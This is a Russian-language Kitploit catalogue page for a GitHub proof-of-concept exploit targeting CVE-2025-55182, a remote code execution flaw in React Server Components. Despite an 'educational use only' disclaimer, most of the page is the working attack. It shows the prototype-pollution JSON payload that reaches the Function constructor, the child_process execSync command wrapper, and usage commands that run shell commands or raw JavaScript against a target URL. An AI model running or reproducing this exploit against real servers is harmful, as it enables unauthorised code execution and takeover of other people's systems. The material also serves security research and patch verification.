Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react-ssr-vulnerability — Это POC-скрипт для CVE-2025-55182 (React SSR RCE) | Kitploit
Инструменты/GitHubGitHub/darker-ink/react-ssr-vulnerability
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

Это POC-скрипт для CVE-2025-55182 (React SSR RCE)

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 - React Server Components RCE POC

Это POC предназначен только для образовательных целей и исследований в области безопасности. Данная уязвимость исправлена в последних версиях затронутых пакетов. Используйте этот инструмент только на системах, которыми вы владеете или на которые имеете явное разрешение на тестирование. Я не несу ответственности за любые юридические меры, предпринятые против вас.

Построение полезной нагрузки

Эксплойт создаёт специально сформированный JSON-объект, который злоупотребляет цепочкой прототипов JavaScript:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // Загрязняет цепочку прототипов
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Внедрённый вредоносный код
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Обёртка команд

POC поддерживает два режима:

Стандартный режим (по умолчанию):

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Обёртывает команды оболочки для выполнения через Node.js child_process.

Сырой режим (флаг --raw):

root@kitploit:~
// Выполняет произвольный JavaScript напрямую

Позволяет напрямую выполнять код JavaScript без обёртки команд оболочки.

Использование

Выполнение базовой команды

root@kitploit:~
bun run index.ts <command_file> <target_url>

Пример:

root@kitploit:~
# Создайте файл с командой
echo "whoami" > cmd.txt

# Выполните против уязвимой конечной точки
bun run index.ts cmd.txt http://localhost:3000

Сырой режим JavaScript

root@kitploit:~
bun run index.ts --raw <js_file> <target_url>

Пример:

root@kitploit:~
# Создайте полезную нагрузку на JavaScript
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Выполните сырой JavaScript
bun run index.ts --raw payload.js http://localhost:3000

Аргументы

  • <file_path>: Путь к файлу, содержащему команду или код JavaScript
  • <target_url>: URL конечной точки функции React Server
  • --raw: (Необязательно) Выполнение сырого JavaScript вместо команд оболочки

Атрибуция

Обнаружено: Lachlan Davidson
Раскрыто: React Team & Meta Security

Ссылки

  • Официальное уведомление о безопасности React
  • CVE-2025-55182
Скачать инструмент